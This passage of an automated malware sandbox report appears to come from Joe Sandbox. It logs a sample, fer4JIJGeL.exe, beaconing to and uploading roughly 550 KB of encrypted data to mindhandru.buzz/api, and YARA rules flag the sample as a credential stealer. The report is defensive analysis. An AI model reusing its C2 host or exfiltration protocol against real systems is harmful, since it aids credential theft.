                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2Fj%2FwwixGomfS%2FVtbwEPod2oSS%2FP6FnaDSOAGJcihUU%2BkQw1ySu%2BLd9pTl8oanQQLw3rB1qvbqsKiJfe6e9K2%2Bb0xqEilUPL9k6dIsBPfLpC9PMp01K2VzRFD2fGGhi53k0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6dfab7641e1-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1738&rtt_var=658&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21210&delivery_rate=1654390&cwnd=243&unsent_bytes=0&cid=34cff4e0f0d2a903&ts=990&x=0"
                                                                                                              2024-12-27 08:00:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:00:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              5192.168.2.849710172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:27 UTC281OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=LK7TWOIGHFY18V46CV8
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 1241
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:27 UTC1241OUTData Raw: 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4b 37 54 57 4f 49 47 48 46 59 31 38 56 34 36 43 56 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61
                                                                                                              Data Ascii: --LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="pid"1--LK7TWOIGHFY18V46CV8Content-Disposition: form-data; name="lid"PsFKDg--pa
                                                                                                              2024-12-27 08:00:29 UTC1127INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:29 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=fe7fpm6hb2hic8dmceaamf5d70; expires=Tue, 22 Apr 2025 01:47:07 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=miOi6SzOGpzY3UprTFKjEA1dIv%2FiE%2FSBBMiGW4kuXKTYeknrefVcPfQO3qTpUfKc7JNKXZEK7DOoUP4QPz3C36nLcBZiAnvVEKfBIg9jYfAUhPj%2FuprWOHAI%2Bs4OUKlruy8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c6f0287841a1-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2465&min_rtt=2457&rtt_var=937&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2158&delivery_rate=1158270&cwnd=229&unsent_bytes=0&cid=1c75957329e68fbe&ts=1452&x=0"
                                                                                                              2024-12-27 08:00:29 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                              2024-12-27 08:00:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              6192.168.2.849711172.67.165.1854437656C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-27 08:00:31 UTC274OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: multipart/form-data; boundary=0WACV1U001
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 551961
                                                                                                              Host: mindhandru.buzz
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 2d 2d 30 57 41 43 56 31 55 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 37 35 30 36 45 42 36 34 31 42 44 37 36 46 31 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 30 57 41 43 56 31 55 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 30 57 41 43 56 31 55 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 0d 0a 2d 2d 30 57 41 43 56 31 55 30 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                              Data Ascii: --0WACV1U001Content-Disposition: form-data; name="hwid"17506EB641BD76F1BEBA0C6A975F1733--0WACV1U001Content-Disposition: form-data; name="pid"1--0WACV1U001Content-Disposition: form-data; name="lid"PsFKDg--pablo--0WACV1U001Content-
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 44 83 0b ba a5 c2 e6 68 ea ce c0 8d b1 2b 46 5a eb d7 cd 4d db 50 e2 ce 83 e6 34 dc 55 63 07 55 65 e6 37 97 82 26 69 c9 59 0d d2 7c 4f 93 98 8a 14 2f d3 c8 e2 83 cc 2a a7 72 19 3d 97 b4 d5 49 0f fd 4b b6 ac a9 c9 02 13 b6 46 28 e3 af 10 79 1b dd fc 18 82 eb a1 1a 05 fc 91 56 b8 d4 eb 57 76 7c eb c5 ab d5 fe 1b ab 20 e3 00 3d 74 1c 75 57 8f 21 2a 86 8e 91 d4 61 68 b1 64 cb 3a 21 ce 88 ae a3 50 8d 0a c3 3e 8f dd 19 7f 94 1e 03 31 4a 79 bc 86 cb a0 5b 69 8f 02 c8 d6 5e 3e f2 1b 60 1c 7b 8d 67 0a 12 e6 64 5e db 4f fc d5 5f e7 3f 8a 5a da e1 63 82 a6 27 bb dd 78 31 98 ed 2e 74 ee 9f 84 d2 f5 c7 11 99 d7 6a 42 db fa ae c9 bc 1b bc b0 be fa d6 7e 41 a1 b4 d2 5b 03 22 df ec ec 50 d0 04 f3 af 8d e3 57 d1 6d 1d 90 03 df 66 ed 88 51 86 ec f2 8c ad d7 2c 04 42 ce e1
                                                                                                              Data Ascii: Dh+FZMP4UcUe7&iY|O/*r=IKF(yVWv| =tuW!*ahd:!P>1Jy[i^>`{gd^O_?Zc'x1.tjB~A["PWmfQ,B
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: d0 7a b1 59 40 b0 ca 3c 2b 43 fb 87 62 8a c1 36 5e 7c 9d bb a5 3c dc c6 bc fc 15 97 6c 22 b9 36 ee 52 d0 10 84 6a d2 b4 6e 23 5e 11 3c e8 74 aa 3c 28 7e f1 a8 82 b9 25 47 d6 27 eb 37 7d 04 e0 4e 6d 6f d6 da 7f 46 97 ba df 76 0b 1b 11 ed 99 2b 79 7b a0 6e 63 d0 a7 87 c2 ed a7 9c 5c aa 8d 74 83 a9 02 a0 b4 e1 bb 7b cf 92 6b f0 e9 88 4f ef 33 1f bb 73 67 ed 7b 2a ba 4c 8d b8 1f fa b5 6c 5e bf 65 6d ac 51 de cc be af 0c 68 be 11 bd aa dd fb ed 84 06 9a e2 07 68 b1 f4 34 91 7a 08 22 4d df b8 1e ad 17 bd b5 d2 a1 cb 9a 82 18 58 91 e1 ba 11 3e 50 6f 02 00 ab ef 2e 04 ab 7c 30 f0 6a 02 0c 5c a0 d6 0d 43 f0 fd 2d 82 da be 80 71 0e a6 20 81 bf 27 18 e0 17 41 da f7 bf 68 fa 27 49 ca 39 a4 8f 03 78 54 6c 80 0f 6c 3c 37 07 74 37 57 d8 53 18 18 5d 7d 84 70 51 c8 93 5e
                                                                                                              Data Ascii: zY@<+Cb6^|<l"6Rjn#^<t<(~%G'7}NmoFv+y{nc\t{kO3sg{*Ll^emQhh4z"MX>Po.|0j\C-q 'Ah'I9xTll<7t7WS]}pQ^
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 50 8a 4c 34 46 90 9a e4 2d 92 09 b1 e2 d6 0a f7 74 1b 89 c3 e4 96 3d 0e a4 1b 57 c4 7f 29 06 3e 63 e3 96 33 0f a5 07 57 c6 b9 7f 59 af 18 89 11 ec fe 0d 17 20 08 07 1b 25 51 bb ed d3 66 e8 ae 7f 2a 84 57 ca 2e ce e5 87 14 57 e2 32 93 e6 7c 3e f5 4a 82 b4 c8 ff b5 46 fd bf cb a1 0a db c1 34 16 75 c2 1f 74 5f b1 da 05 72 b4 30 2e 93 7c a0 61 35 e0 aa c2 35 a6 8c 3a f6 73 47 d3 da b1 83 e0 30 7f bc 54 84 1b 64 b9 f8 2a 2e 04 05 9f f4 07 a1 fd 87 a3 5d ae 99 32 28 f8 2c ab a1 c1 f9 85 24 2c 48 55 f8 61 cc 3d da e8 24 cb 39 9a 78 15 1b f2 b1 d1 98 f9 c2 3a 39 e4 20 aa ef 2d ba 80 1f ea 2a 2e 02 c3 3d 75 c6 e5 9b e3 02 1e 57 36 0f 69 01 f9 f3 7b f9 80 b2 ba a8 32 67 c9 5d 6f 5c fe 61 58 4d 57 91 4a e7 a1 f3 f4 b8 43 ae 18 b1 51 84 f5 3c 6a 13 69 9c 88 cb 57 05
                                                                                                              Data Ascii: PL4F-t=W)>c3WY %Qf*W.W2|>JF4ut_r0.|a55:sG0Td*.]2(,$,HUa=$9x:9 -*.=uW6i{2g]o\aXMWJCQ<jiW
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 4e a9 6c e4 44 9f b1 3a 70 2e b2 4d a7 6b af 1e 2d 75 55 a4 3b ec 62 7d af b2 fe 47 26 39 3f 9c 83 16 46 a1 36 12 e8 a1 f7 2b 10 32 2d 80 9a 16 5d 84 58 26 76 6f e8 d3 e1 1f 4e cc 37 1a 61 c3 5d 1a 94 2d 5d 33 ed 93 86 06 59 fc ee fd e5 b7 37 5e 8a d2 44 f8 6d 80 1d 86 a7 2b df 56 67 3c 25 53 04 92 eb 64 23 8d ea 90 24 90 38 86 3a b7 75 71 ac 1a 3d 1f 5f aa 91 0e df 11 5e 7a 2c ac 26 97 6c 61 9b 91 80 13 17 db 3b 5f b8 63 9b b6 80 c2 2d ee e4 fa 53 d9 c8 23 c2 c6 55 df 56 1a b5 02 56 33 5b d8 84 b0 46 6d 8c 38 78 dd bb 6f 24 6b 4a 02 7c bb df 78 08 4b 0f be 46 95 97 df 09 04 bf a2 47 aa 22 8d e5 d5 85 ff 18 ae 92 e3 bd 78 3c 27 62 fc fe 5b 05 38 ff 5c 47 9d d5 96 93 5f 8e ee 05 34 3c e3 b7 3e 2a 1b 80 ad c5 b2 c7 5a f5 b6 02 69 06 58 0f d9 07 84 5d 87 b2
                                                                                                              Data Ascii: NlD:p.Mk-uU;b}G&9?F6+2-]X&voN7a]-]3Y7^Dm+Vg<%Sd#$8:uq=_^z,&la;_c-S#UVV3[Fm8xo$kJ|xKFG"x<'b[8\G_4<>*ZiX]
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 01 eb 3e fa 63 e9 4f b7 e6 06 b9 f9 ed 25 16 c6 d2 66 88 2e 48 2b 07 e7 e5 e7 c5 11 64 c3 cd ae f9 35 06 10 7a 7d 63 0b d9 04 fb 5c 86 18 58 00 c7 25 5d 94 0b 1f 5a b6 61 35 36 0c 12 39 36 6b 99 28 c6 d7 de b5 23 24 47 ce 2d 5e 8b 57 46 cf 2c a2 e1 98 87 ba 10 d8 97 0a 34 d1 bc e9 4a ea 1b bf 70 32 8d 7c 2e ea b4 87 4c 46 31 a7 40 3c 2d a2 6c 96 61 ba bb 54 e5 b5 46 f7 cf eb 68 14 18 58 5c 6d 3a 02 b3 63 e0 4d 7d 0c 3f b8 4d a6 bd fb 6f 93 ed 26 60 d2 d4 80 65 9c 63 fe a4 3f 1f f3 22 c4 f8 8b aa 8b 01 76 7c 58 2d a2 b7 25 28 c8 7c 18 f1 11 59 97 50 dc 21 f1 02 79 3c fe b8 14 98 ae 87 10 0d 2b 05 31 4e f4 c2 8d fb c2 07 5e 39 e1 ed 30 80 1f 5a ba 0c f6 e2 8b 5c 25 56 95 85 bf 58 7a bb 1d 7f 56 39 b9 38 f5 12 db 7d 0b 58 bb b2 91 3d 84 e5 fa 8c d1 a2 9c 5a
                                                                                                              Data Ascii: >cO%f.H+d5z}c\X%]Za5696k(#$G-^WF,4Jp2|.LF1@<-laTFhX\m:cM}?Mo&`ec?"v|X-%(|YP!y<+1N^90Z\%VXzV98}X=Z
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 40 b5 ed 7c 63 89 db 12 47 5c df 99 a2 c1 44 45 85 be 96 6d d5 47 23 17 12 6d 09 b6 5a 67 06 6a ad b5 5c 22 76 88 96 9e 64 26 21 b5 7d 35 fd 7f db c1 e1 29 42 1e 43 19 de e8 d7 b2 f4 80 be 28 c1 05 1d bb a1 c7 9e f3 6e 5a 15 dc 77 9e 9f 00 9f 27 af 98 40 d1 9e f2 9c 3c b7 dd 17 70 3b d2 ea 09 40 0b 13 c2 f7 9a 88 1f 77 b3 45 18 49 97 12 1f 98 f4 62 8e fb 18 ef 4c dd 35 79 9a 9c e2 23 ff da 97 e7 08 cc b0 39 9a a4 5e f5 7c aa f6 5d d1 c2 55 82 ed 48 83 e6 ad 54 b3 9a a4 cd c4 bf 2f 98 91 35 10 45 f3 ad 4a 39 76 6e c0 bc ce 18 61 32 38 a7 96 69 f3 82 d1 21 9a c3 7a e0 e3 aa b1 49 17 31 9d c6 9e 01 39 73 a6 cd f8 cb e5 71 75 66 08 33 60 1a 13 2c 39 03 8d c7 b0 32 1a 22 66 77 c8 87 fb 6d 9d b3 ca 4c 90 a8 ff 6f 22 de f8 47 9c d6 90 42 3f ad ea 83 48 6d 3a c4
                                                                                                              Data Ascii: @|cG\DEmG#mZgj\"vd&!}5)BC(nZw'@<p;@wEIbL5y#9^|]UHT/5EJ9vna28i!zI19squf3`,92"fwmLo"GB?Hm:
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 94 92 99 6b 83 52 bc 44 34 ff 0d 5b 0d 4f 4e f3 73 d5 ec 93 2d b2 f8 88 20 3f 42 c3 92 08 31 e9 dc 63 da ed 92 5e 8f c2 7e 2b 38 f0 a2 05 02 33 ba 26 ef 98 f8 67 c8 72 5e 92 68 55 3c 5a 71 28 67 8e 7e 67 a2 41 90 8d 1a 7a c2 d6 43 76 fb 57 b6 e8 6c 0b fd 59 af 9b 33 c7 48 f0 1c 37 75 5a 2d 32 ac 0b 6b 3f 4e 42 98 68 08 14 7d a7 cc 74 12 36 35 32 33 22 19 6e bc e6 cf 82 0c 9f 17 dc c1 b8 10 a6 3e d3 a0 81 26 08 fd 92 db c9 bc 64 e1 78 89 59 0b ad 7d ef 3d c6 d2 36 1c ef 00 52 32 82 af 85 92 96 90 b3 72 b5 6b 1a 4d a2 ea 72 34 71 f9 08 3f 68 58 98 a8 48 51 cc 4a 7f 1c 82 72 cf 14 80 93 0c c0 a5 a5 c2 26 d4 fb 4f f2 fb ac 32 f9 a1 b3 33 39 dd a6 04 d3 68 26 ea c3 fe 73 1b 7c 59 ae 10 3d 80 b9 32 64 f2 38 5c 5c 93 89 45 6d ff c6 80 c3 73 a9 af e3 96 6e 8d 2b
                                                                                                              Data Ascii: kRD4[ONs- ?B1c^~+83&gr^hU<Zq(g~gAzCvWlY3H7uZ-2k?NBh}t6523"n>&dxY}=6R2rkMr4q?hXHQJr&O239h&s|Y=2d8\\Emsn+
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: d4 58 a2 00 c2 a6 55 ef 8a f7 02 d3 57 7b 99 4b cf 8f b9 21 89 cf 3c f4 1e fe 55 04 25 30 93 40 d4 98 80 a3 86 c0 4b 1e ec 66 da 83 94 48 2a cc f9 f7 b6 d1 77 37 91 b2 41 e1 b3 d0 42 17 80 1d 51 06 49 8e 0e 81 22 d7 b0 00 5a ef 12 d3 33 51 58 70 4f 8e d9 b9 10 ae f1 d0 bc 2a 14 89 55 5c ef da 34 8d 8e 44 45 45 47 8d 75 cc c3 56 c6 ee 59 58 74 90 a7 48 46 ab f0 39 53 6c 8b d9 81 c3 a9 57 05 c5 c1 a3 93 0c 63 0d 81 4b 68 20 a7 b4 fd 40 f4 74 22 23 f1 38 a9 0d d1 e0 7e 07 2b d8 f7 82 23 0a 12 8b 40 cb 17 c6 da 69 50 8d 93 90 2e cb f6 ba 7e b8 e5 10 db 04 1a 65 dc 2b 7d c8 50 89 d6 71 2d 32 ef b5 ec b0 1c 79 9c 24 da 01 1b 72 6f a3 96 3d 00 af 48 13 80 66 ef 10 8f dc 36 fb 7c 5e 75 6c 89 23 fb 3b 26 57 14 2f 3a ea 4a 48 d8 70 0e ce 28 41 ee f9 a9 a6 be f5 dc
                                                                                                              Data Ascii: XUW{K!<U%0@KfH*w7ABQI"Z3QXpO*U\4DEEGuVYXtHF9SlWcKh @t"#8~+#@iP.~e+}Pq-2y$ro=Hf6|^ul#;&W/:JHp(A
                                                                                                              2024-12-27 08:00:31 UTC15331OUTData Raw: 00 4b e6 90 32 8a db 68 ce 48 a0 fc ae 1d f6 98 58 f0 1b 0b dd fc ce 19 5c 0f 52 09 f2 33 29 cb 0d 10 9d 9d 12 a1 ff 79 af 0f 40 e9 a1 94 87 9b 5f dc ec b7 08 16 b7 c9 29 3c 3d 0e fa de 5e 58 f7 eb fe bf c3 5e 07 a0 8c a0 85 5d e0 03 8e 1c 8a a0 4a 5c c5 b6 69 81 ad 6c b5 8d a2 23 6d 62 5b 81 d0 54 61 4c 59 08 9f 8f a2 d3 07 9d 8b e4 77 18 4a cb 9f c7 34 32 df 73 8b ad 65 c8 e4 2b 41 e6 d6 9b dc 7f b7 ec 0e 6b 5b 52 e6 33 f1 80 01 1f 4a f7 d7 bb 91 02 13 7d 77 e9 3f 41 8f 05 d9 0e d4 c2 1d 4f 01 29 1b ee de e1 59 73 52 02 a2 6e 6b fa 21 82 00 03 8f c2 3e e8 9f ad 4d 0f 42 d8 a0 80 33 a3 77 d7 42 51 00 5f ee 05 c4 ee 19 6f 0c ca 7e b6 f6 19 20 9a 31 de 60 c9 bb cd 5c ef 9f a6 04 6e 5e 42 92 9d 74 ff db a9 c9 b0 83 f0 0e 1c f6 e1 64 d5 1a 97 32 1e 9e 41 10
                                                                                                              Data Ascii: K2hHX\R3)y@_)<=^X^]J\il#mb[TaLYwJ42se+Ak[R3J}w?AO)YsRnk!>MB3wBQ_o~ 1`\n^Btd2A
                                                                                                              2024-12-27 08:00:33 UTC1129INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:00:33 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=ibsvtd19i9uhi9dusrt5qse3bm; expires=Tue, 22 Apr 2025 01:47:12 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S99TPR3Mo0mmvH0uF3t9zKgZUIz8B5edoR2FyNn2a%2FWsk7yMzHorw0cC60iLUpkRWT7q5CFMSUTQazI0dbS6S6x8E1Mi1Kxy0CEJ1zzdT2fZs8%2B9ID9e4CkCYm7A8BIoqRc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c7040f02c413-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1629&min_rtt=1622&rtt_var=624&sent=350&recv=580&lost=0&retrans=0&sent_bytes=2838&recv_bytes=554455&delivery_rate=1732937&cwnd=173&unsent_bytes=0&cid=de24190267e540a2&ts=2437&x=0"


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:03:00:12
                                                                                                              Start date:27/12/2024
                                                                                                              Path:C:\Users\user\Desktop\fer4JIJGeL.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\fer4JIJGeL.exe"
                                                                                                              Imagebase:0xc30000
                                                                                                              File size:1'854'976 bytes
                                                                                                              MD5 hash:0D3B04489BAA22C2F702C549466B64F4
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1510871342.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1537869604.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535594138.0000000001871000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1535594138.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1510871342.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1538148540.000000000184C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1537765553.0000000001835000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              No disassembly